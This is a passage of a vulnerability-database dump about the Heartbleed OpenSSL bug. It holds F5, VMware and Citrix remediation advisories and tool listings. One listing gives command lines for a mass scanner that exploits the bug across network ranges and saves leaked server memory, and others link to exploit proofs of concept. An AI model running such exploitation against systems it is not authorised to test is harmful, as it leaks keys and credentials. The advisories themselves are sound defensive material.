utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "edition": 1, "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "edition": 1, "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2020-03-11T02:54:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * VMware GemFire Native Client 7.0.2.X\n * VMware Command Center 2.0.x, 2.1.x\n * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "edition": 6, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2020-02-25T04:38:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "edition": 20, "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T04:43:38", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "edition": 18, "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-08T15:23:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/--GJBN1j_Ojw/WFcdv3p9uVI/AAAAAAAAGsw/kk8HnTh5VRQ4CGEP7LCNnUddk63xt4fRQCLcB/s1600/sslscan.png>)\n\n \nThis is a fork of ioerror's version of sslscan (the original readme of which is included below). Changes are as follows: \n\n\n * Highlight SSLv2 and SSLv3 ciphers in output. \n * Highlight CBC ciphers on SSLv3 (POODLE). \n * Highlight 3DES and RC4 ciphers in output. \n * Highlight PFS+GCM ciphers as good in output. \n * Highlight NULL (0 bit), weak (<40 bit) and medium (40 < n <= 56) ciphers in output. \n * Highlight anonymous (ADH and AECDH) ciphers in output (purple). \n * Hide certificate information by default (display with ` --get-certificate ` ). \n * Hide rejected ciphers by default (display with ` --failed ` ). \n * Added TLSv1.1 and TLSv1.2 support (merged from twwbond/sslscan). \n * Compiles if OpenSSL does not support SSLv2 ciphers (merged from digineo/sslscan). \n * Supports IPv6 hostnames (can be forced with ` --ipv6 ` ). \n * Check for TLS compression (CRIME, disable with ` --no-compression ` ). \n * Disable cipher suite checking ` --no-ciphersuites ` . \n * Disable coloured output ` --no-colour ` . \n * Removed undocumented -p output option. \n * Added check for OpenSSL HeartBleed (CVE-2014-0160, disable with ` --no-heartbleed ` ). \n * Flag certificates signed with MD5 or SHA-1, or with short (<2048 bit) RSA keys. \n * Support scanning RDP servers with ` --rdp ` (credit skettler). \n * Added option to specify socket timeout. \n * Added option for static compilation (credit dmke). \n * Added ` --sleep ` option to pause between requests. \n * Disable output for anything than specified checks ` --no-preferred ` . \n * Determine the list of CAs acceptable for client certificates ` --show-client-cas ` . \n * Experimental build support on OSX (credit MikeSchroll). \n * Flag some self-signed SSL certificates. \n * Experimental Windows support (credit jtesta). \n * Display EC curve names and DHE key lengths with OpenSSL >= 1.0.2 ` --no-cipher-details ` . \n * Flag weak DHE keys with OpenSSL >= 1.0.2 ` --cipher-details ` . \n * Flag expired certificates. \n * Flag TLSv1.0 ciphers in output as weak. \n * Experimental OSX support (static building only). \n * Support for scanning PostgreSQL servers (credit nuxi). \n * Check for TLS Fallback SCSV support. \n * Added StartTLS support for LDAP ` --starttls-ldap ` . \n * Added SNI support ` --sni-name ` (credit Ken). \n \n** Building on Windows ** \nThanks to a patch by jtesta, sslscan can now be compiled on Windows. This can either be done natively or by cross-compiling from Linux. See INSTALL for instructions. \nNote that sslscan was originally written for Linux, and has not been extensively tested on Windows. As such, the Windows version should be considered experimental. \nPre-build cross-compiled Windows binaries are available on the [ GitHub Releases Page ](<https://github.com/rbsec/sslscan/releases>) . \n \n** Building on OS X ** \nThere is experimental support for statically building on OS X, however this should be considered unsupported. You may need to install any dependencies required to compile OpenSSL from source on OS X. Once you have, just run: \n\n \n \n make static\n\n \n** OpenSSL issues ** \n \n** Statically linking a custom OpenSSL build ** \nIt is possible to ignore the OpenSSL system installation and ship your own version. Although this results in a more resource-heavy ` sslscan ` binary (file size, memory consumption, etc.), this allows to enable both SSLv2 and SSLv3 ciphers. In comparison to the method of repackaging the Debian build, this custom OpenSSL build won't affect other tools on the same system, as they would use the version packaged by the distro's maintainers. \nTo compile your own OpenSSL version, you'll probably need to install the OpenSSL build dependencies: \n\n \n \n apt-get install build-essential git zlib1g-dev\n apt-get build-dep openssl\n\nthen run \n\n \n \n make static\n\nwhich will clone the [ OpenSSL repository ](<https://github.com/openssl/openssl>) , and configure/compile/test OpenSSL prior to compiling ` sslscan ` . \n** Please note: ** Out of the box, OpenSSL cannot compiled with ` clang ` without further customization (which is not done by the provided ` Makefile ` ). For more information on this, see [ Modifying Build Settings ](<https://wiki.openssl.org/index.php/Compilation_and_Installation#Modifying_Build_Settings>) in the OpenSSL wiki. \nYou can verify whether you have a statically linked OpenSSL version, if \n\n \n \n ./sslscan --version\n\nlooks a bit like \n\n \n \n 1.x.y-...-static\n OpenSSL 1.1.0-dev xx XXX xxxx\n\n(pay attention to the ` -static ` suffix and the ` 1.1.0-dev ` OpenSSL version). \n \n** Building on Kali ** \nKali now ships with a statically built version of sslscan which supports SSLv2. \nThe package can be found in the [ Kali Git Repository ](<http://git.kali.org/gitweb/?p=packages/sslscan.git;a=summary>) . \nIf for whatever reason you can't install this package, follow the instructions above for statically building against OpenSSL. \n \n** Building on Debian ** \nIt is recommended that you statically build sslscan using the instructions listed above. If this is not an option and you want to compile your system OpenSSL with support for legacy protocols such as SSLv2 and SSLv3 then follow the instructions below. \nNote that many modern distros (including Debian) ship with a version of OpenSSL that disables support for SSLv2 ciphers. If ` sslscan ` is compiled on one of these distros, it will not be able to detect SSLv2. \nThis issue can be resolved by rebuilding OpenSSL from source after removing the patch that disables SSLv2 support. \nThe ` build_openssl_debian.sh ` script automates this process for Debian systems. It has been tested on Debian Squeeze/Wheezy; it may work on other Debian based distros, but has not been tested. The built version of OpenSSL will be installed using ` dpkg ` . \nIf it is not possible to rebuild OpenSSL, ` sslscan ` will still compile (thanks to a patch from [ digineo/sslscan ](<https://github.com/digineo/sslscan>) , based on the debian patch). However, a warning will be displayed in the output to notify the user that SSLv2 ciphers will not be detected. \n \n \n\n\n** [ Download sslscan ](<https://github.com/rbsec/sslscan>) **\n", "edition": 28, "modified": "2016-12-26T14:30:12", "published": "2016-12-26T14:30:12", "id": "KITPLOIT:8661324951126484733", "href": "http://www.kitploit.com/2016/12/sslscan-tests-ssltls-enabled-services.html", "title": "sslscan - tests SSL/TLS enabled services to discover supported cipher suites", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "citrix": [{"lastseen": "2020-11-18T15:29:34", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160", "CVE-2015-0160"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<p> <a name=\"TopOfPage\"></a></p>\n<p> <span> <b>Overview</b></span></p>\n<p> <span>A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSSL server or client. </span></p>\n<p> <span>The issue has been assigned the following CVE identifier and is also known as the Heartbleed vulnerability:</span></p>\n<p> <span>CVE-2014-0160: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160</a></u></span></p>\n<p> <span> <b>What Citrix is Doing</b></span></p>\n<p> <span>Citrix has analyzed the impact of this issue on currently supported products. The following sections of this advisory provide impact information on each product.</span></p>\n<p> <span> <b>Products That Require Citrix Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 HDX RealTime Optimization Pack for Microsoft Lync 2010:</b> This component is vulnerable to CVE-2014-0160. An updated version of this component has been released to address this issue. Citrix recommends customers deploy these patches as soon as possible. These patches can be found on our website at the following locations:</span></p>\n<p> <span>o Windows - <u> <a href=\"https://support.citrix.com/article/CTX140719\">https://support.citrix.com/article/CTX140719</a></u></span></p>\n<p> <span>o Mac - <u> <a href=\"https://support.citrix.com/article/CTX140730\">https://support.citrix.com/article/CTX140730</a></u></span></p>\n<p> <span>o Linux - <u> <a href=\"https://support.citrix.com/article/CTX140732\">https://support.citrix.com/article/CTX140732</a></u></span></p>\n<p> <span> <b>\u2022 Citrix XenMobile App Controller: </b>XenMobile App Controller versions 2.9 and 2.10 are vulnerable to CVE-2014-0160. Patches have been released to address this issue for both App controller 2.9 and 2.10. Citrix recommends that customers deploy these patches as soon as possible. These patches are available from the following location: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Further information on this can be found in the following blog post: <u> <a href=\"http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/\">http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/</a></u> <a name=\"P17_1652\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDX Toolkit & SDK:</b> MDX Toolkit and SDK Versions 2.2.1 (XenMobile 8.6.1) and 2.3.61 (XenMobile 8.7) use a vulnerable version of OpenSSL when wrapping iOS applications. Enterprise-ready mobile apps on the Worx App Gallery that use this version of Worx SDK also use a vulnerable version of OpenSSL. Outgoing micro VPN network connections to Access Gateway from iOS applications that were wrapped, or Worx SDK enabled, with this version will be encapsulated in a TLS connection that uses a vulnerable version of OpenSSL. Citrix has released a new version of the MDX Toolkit & SDK for iOS and Android Build MDX Toolkit; this can be found on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Wrapped Android applications make use of the underlying Android version of OpenSSL, Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for iOS:</b> Worx Home for iOS version 8.7 uses a vulnerable version of 